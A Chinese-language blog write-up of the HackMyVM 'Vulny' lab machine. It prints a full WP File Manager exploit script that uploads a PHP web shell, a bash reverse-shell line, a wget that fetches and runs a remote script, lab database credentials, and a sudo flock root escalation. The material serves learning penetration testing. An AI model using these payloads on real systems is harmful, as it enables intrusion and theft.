guayu-kakeru
0%

HMV-Vulny

发表于 更新于 分类于

HMV-Vulny靶场复盘


这个靶机是一个ubuntu系统的靶机,前面获取不到靶机ip,修改了好长时间,不过也正好补充我的靶机配置博客
解决方案在: mac环境靶场搭建

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.240.139  
sh: 0: getcwd() failed: No such file or directory
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-01 16:32 CST
Nmap scan report for 192.168.240.139 (192.168.240.139)
Host is up (0.0026s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: B2:A7:1A:3F:30:A9 (Unknown)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   2.61 ms 192.168.240.139 (192.168.240.139)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.33 seconds

显示只有一个80的web端口 我们下一步就去web找更多信息

web探测

web默认界面是ubuntu系统界面,没有多余信息
目录扫描:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
┌──(root㉿kakeru)-[~/tmp]
└─# dirsearch -u 192.168.240.139
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/tmp/reports/_192.168.240.139/_25-02-01_16-36-17.txt

Target: http://192.168.240.139/

[16:36:17] Starting: 
[16:36:17] 403 -  280B  - /.ht_wsr.txt                                      
[16:36:17] 403 -  280B  - /.htaccess.bak1                                   
[16:36:17] 403 -  280B  - /.htaccess.orig                                   
[16:36:17] 403 -  280B  - /.htaccess.sample                                 
[16:36:17] 403 -  280B  - /.htaccess_extra                                  
[16:36:17] 403 -  280B  - /.htaccess.save
[16:36:17] 403 -  280B  - /.htaccessBAK
[16:36:17] 403 -  280B  - /.htaccess_orig
[16:36:17] 403 -  280B  - /.htaccessOLD                                     
[16:36:17] 403 -  280B  - /.htaccess_sc
[16:36:17] 403 -  280B  - /.htaccessOLD2
[16:36:17] 403 -  280B  - /.htm                                             
[16:36:17] 403 -  280B  - /.html                                            
[16:36:17] 403 -  280B  - /.httr-oauth                                      
[16:36:17] 403 -  280B  - /.htpasswds
[16:36:18] 403 -  280B  - /.php                                             
[16:36:19] 403 -  280B  - /.htpasswd_test                                   
[16:36:24] 301 -  323B  - /javascript  ->  http://192.168.240.139/javascript/
[16:36:27] 301 -  319B  - /secret  ->  http://192.168.240.139/secret/       
[16:36:27] 403 -  280B  - /server-status/                                   
[16:36:27] 403 -  280B  - /server-status                                    
[16:36:27] 404 -  225B  - /secret/                                          
                                                                             
Task Completed

找到两个目录 

1
2
3
4
5
6
7
8
9
10
11
12
──(root㉿kakeru)-[~/tmp]
└─# curl http://192.168.240.139/javascript/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server at 192.168.240.139 Port 80</address>
</body></html>

javascript这个目录没有权限

1
2
3
┌──(root㉿kakeru)-[~/tmp]
└─# curl http://192.168.240.139/secret/    
Neither <b>/etc/wordpress/config-192.168.240.139.php</b> nor <b>/etc/wordpress/config-168.240.139.php</b> could be found. <br/> Ensure one of them exists, is readable by the webserver and contains the right password/username.

所以这个secret目录下面是wordpress服务,但是无法解析
继续用dirsearch扫描secret下的目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
┌──(root㉿kakeru)-[~/tmp]
└─# dirsearch -u 192.168.240.139/secret/                        
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/tmp/reports/_192.168.240.139/_secret__25-02-01_16-42-21.txt

Target: http://192.168.240.139/

[16:42:21] Starting: secret/
[16:42:22] 403 -  280B  - /secret/.ht_wsr.txt                               
[16:42:22] 403 -  280B  - /secret/.htaccess.save                            
[16:42:22] 403 -  280B  - /secret/.htaccess.sample
[16:42:22] 403 -  280B  - /secret/.htaccess.orig
[16:42:22] 403 -  280B  - /secret/.htaccess.bak1                            
[16:42:22] 403 -  280B  - /secret/.htaccess_extra                           
[16:42:22] 403 -  280B  - /secret/.htaccessBAK
[16:42:22] 403 -  280B  - /secret/.htaccessOLD
[16:42:22] 403 -  280B  - /secret/.htm                                      
[16:42:22] 403 -  280B  - /secret/.html
[16:42:22] 403 -  280B  - /secret/.htaccess_sc
[16:42:22] 403 -  280B  - /secret/.htpasswds                                
[16:42:22] 403 -  280B  - /secret/.htaccess_orig                            
[16:42:22] 403 -  280B  - /secret/.htaccessOLD2
[16:42:22] 403 -  280B  - /secret/.httr-oauth                               
[16:42:22] 403 -  280B  - /secret/.htpasswd_test                            
[16:42:22] 403 -  280B  - /secret/.php                                      
[16:42:33] 200 -    3KB - /secret/readme.html                               
[16:42:36] 301 -  328B  - /secret/wp-admin  ->  http://192.168.240.139/secret/wp-admin/
[16:42:36] 301 -  330B  - /secret/wp-content  ->  http://192.168.240.139/secret/wp-content/
[16:42:36] 200 -  471B  - /secret/wp-content/upgrade/                       
[16:42:36] 301 -  331B  - /secret/wp-includes  ->  http://192.168.240.139/secret/wp-includes/
[16:42:36] 500 -  613B  - /secret/wp-content/plugins/akismet/akismet.php    
[16:42:36] 500 -  613B  - /secret/wp-content/plugins/akismet/admin.php
[16:42:36] 403 -  280B  - /secret/wp-includes/                              
[16:42:36] 200 -  488B  - /secret/wp-content/uploads/                       
[16:42:36] 200 -  514B  - /secret/wp-content/                               
[16:42:36] 500 -    0B  - /secret/wp-includes/rss-functions.php             
[16:42:39] 500 -    3KB - /secret/wp-admin/setup-config.php

找到一些目录
wp-content这个目录是一些wordpress的文件 也只有这个目录下面有有用的信息

找到了一个插件

这里就不知道如何利用插件的漏洞了,看群主ll104567的视频有了后面的进展 先用searchsploit找到利用的py脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(root㉿kakeru)-[~/tmp]
└─# searchsploit        wp-file-manager   
----------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                     |  Path
----------------------------------------------------------------------------------- ---------------------------------
WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE        | php/webapps/51224.py
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(root㉿kakeru)-[~/tmp]
└─# searchsploit -m 51224
  Exploit: WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE
      URL: https://www.exploit-db.com/exploits/51224
     Path: /usr/share/exploitdb/exploits/php/webapps/51224.py
    Codes: CVE-2020-25213
 Verified: True
File Type: Python script, ASCII text executable, with very long lines (501)
Copied to: /root/tmp/51224.py


查看这个脚本做了什么

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
──(root㉿kakeru)-[~/tmp]
└─# cat 51224.py                             
#!/usr/bin/env

# Exploit Title: WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE
# Date: [ 22-01-2023 ]
# Exploit Author: [BLY]
# Vendor Homepage: [https://wpscan.com/vulnerability/10389]
# Version: [ File Manager plugin 6.0-6.9]
# Tested on: [ Debian ]
# CVE : [ CVE-2020-25213 ]

import sys,signal,time,requests
from bs4 import BeautifulSoup
#from pprint import pprint

def handler(sig,frame):
	print ("[!]Saliendo")
	sys.exit(1)

signal.signal(signal.SIGINT,handler)

def commandexec(command):

	exec_url = url+"/wp-content/plugins/wp-file-manager/lib/php/../files/shell.php"
	params = {
		"cmd":command
	}

	r=requests.get(exec_url,params=params)

	soup = BeautifulSoup(r.text, 'html.parser')
	text = soup.get_text()

	print (text)
def exploit():

	global url

	url = sys.argv[1]
	command = sys.argv[2]
	upload_url = url+"/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"

	headers = {
			'content-type': "multipart/form-data; boundary=----WebKitFormBoundaryvToPIGAB0m9SB1Ww",
			'Connection': "close"
	}

	payload = "------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php echo \"<pre>\" . shell_exec($_REQUEST['cmd']) . \"</pre>\"; ?>\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww--"

	try:
		r=requests.post(upload_url,data=payload,headers=headers)
		#pprint(r.json())
		commandexec(command)
	except:
		print("[!] Algo ha salido mal...")




def help():

	print ("\n[*] Uso: python3",sys.argv[0],"\"url\" \"comando\"")
	print ("[!] Ejemplo: python3",sys.argv[0],"http://wordpress.local/ id")




if __name__ == '__main__':

	if len(sys.argv) != 3:
		help()

	else:
		exploit()

可以直接到web访问路径//wp-content/plugins/wp-file-manager/lib/files/shell.php
后面?cmd= 传入要执行的命令也可以

cmd传入命令 然后执行

1
2
3
4
5
6
7
8
9
┌──(root㉿kakeru)-[~/tmp]
└─# python3 51224.py               

[*] Uso: python3 51224.py "url" "comando"
[!] Ejemplo: python3 51224.py http://wordpress.local/ id
                                                                                                                     
┌──(root㉿kakeru)-[~/tmp]
└─# python3 51224.py http://192.168.240.139/secret id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

根据使用示例知道了用法 把id改成要执行的命令
然后反弹shell 但是这里用nc没有办法反弹回shell
用另外一种方式 写一个reverse.sh

1
bash -i >& /dev/tcp/192.168.240.83/1234 0>&1

启动http服务 让web那边可以接受到本机的文件

1
2
3
┌──(root㉿kakeru)-[~/tmp]
└─# python3 -m http.   server                                                              
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

在web端输入

1
2
?cmd=wget 192.168.240.83:8000/reverse.sh
?cmd=bash reverse.sh

拿到shell

1
2
3
4
5
6
7
8
┌──(root㉿kakeru)-[~/tmp]
└─# nc -lp 1234
id
bash: cannot set terminal process group (650): Inappropriate ioctl for device
bash: no job control in this shell
<ress/wp-content/plugins/wp-file-manager/lib/files$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
<ress/wp-content/plugins/wp-file-manager/lib/files$

提权

根据最开始的提示有信息的php文件,找到这个文件,查看内容

1
2
3
4
5
6
7
8
9
10
11
www-data@vulny:/etc/wordpress$ cat config-192.168.1.122.php
cat config-192.168.1.122.php
<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'wordpress');
define('DB_PASSWORD', 'myfuckingpassword');
define('DB_HOST', 'localhost');
define('DB_COLLATE', 'utf8_general_ci');
define('WP_CONTENT_DIR', '/usr/share/wordpress/wp-content');
?>
www-data@vulny:/etc/wordpress$

这里有数据库密码 myfuckingpassword
看了wp 在去/usr/share/wordpress/wp-config.php中找内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
www-data@vulny:/usr/share/wordpress$ cat wp-config.php
cat wp-config.php
<?php
/***
 * WordPress's Debianised default master config file
 * Please do NOT edit and learn how the configuration works in
 * /usr/share/doc/wordpress/README.Debian
 ***/

/* Look up a host-specific config file in
 * /etc/wordpress/config-<host>.php or /etc/wordpress/config-<domain>.php
 */
$debian_server = preg_replace('/:.*/', "", $_SERVER['HTTP_HOST']);
$debian_server = preg_replace("/[^a-zA-Z0-9.\-]/", "", $debian_server);
$debian_file = '/etc/wordpress/config-'.strtolower($debian_server).'.php';
/* Main site in case of multisite with subdomains */
$debian_main_server = preg_replace("/^[^.]*\./", "", $debian_server);
$debian_main_file = '/etc/wordpress/config-'.strtolower($debian_main_server).'.php';

if (file_exists($debian_file)) {
    require_once($debian_file);
    define('DEBIAN_FILE', $debian_file);
} elseif (file_exists($debian_main_file)) {
    require_once($debian_main_file);
    define('DEBIAN_FILE', $debian_main_file);
} elseif (file_exists("/etc/wordpress/config-default.php")) {
    require_once("/etc/wordpress/config-default.php");
    define('DEBIAN_FILE', "/etc/wordpress/config-default.php");
} else {
    header("HTTP/1.0 404 Not Found");
    echo "Neither <b>$debian_file</b> nor <b>$debian_main_file</b> could be found. <br/> Ensure one of them exists, is readable by the webserver and contains the right password/username.";
    exit(1);
}

/* idrinksomewater */

/* Default value for some constants if they have not yet been set
   by the host-specific config files */
if (!defined('ABSPATH'))
    define('ABSPATH', '/usr/share/wordpress/');
if (!defined('WP_CORE_UPDATE'))
    define('WP_CORE_UPDATE', false);
if (!defined('WP_ALLOW_MULTISITE'))
    define('WP_ALLOW_MULTISITE', true);
if (!defined('DB_NAME'))
    define('DB_NAME', 'wordpress');
if (!defined('DB_USER'))
    define('DB_USER', 'wordpress');
if (!defined('DB_HOST'))
    define('DB_HOST', 'localhost');
if (!defined('WP_CONTENT_DIR') && !defined('DONT_SET_WP_CONTENT_DIR'))
    define('WP_CONTENT_DIR', '/var/lib/wordpress/wp-content');

/* Default value for the table_prefix variable so that it doesn't need to
   be put in every host-specific config file */
if (!isset($table_prefix)) {
    $table_prefix = 'wp_';
}

if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https')
    $_SERVER['HTTPS'] = 'on';

require_once(ABSPATH . 'wp-settings.php');
?>

有一个注释/* idrinksomewater */ 这个 就是用户的密码,用户在home目录有显示名称
查看sudo-l

1
2
3
4
5
6
7
sudo -l
Matching Defaults entries for adrian on vulny:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User adrian may run the following commands on vulny:
    (ALL : ALL) NOPASSWD: /usr/bin/flock

用flock 提权
在gtfobins找到提权方法

1
sudo flock -u / /bin/sh

这个命令的本意是 “解锁 / 之后执行 /bin/sh”,但由于 flock -u / 没有实际影响,它相当于:
sudo /bin/sh

1
2
3
4
5
6
7
sudo /usr/bin/flock / /bin/bash
id
uid=0(root) gid=0(root) groups=0(root)
ls
user.txt
cat /root/*.txt
HMVididit

完成

总结:我遇到的一些卡点:1.搜索secret目录下的二级目录 2.找到插件的漏洞利用脚本 3.用出了nc -e的另一种方法反弹shell
学习到了: 1.python3 -m http.server 开启一个http服务 让web可以用wget接收脚本 2.reverse.sh的利用,接收之后用bash执行 3.wordpress题目去/usr/share/wordpress/wp-config.php中看看 4.flock提权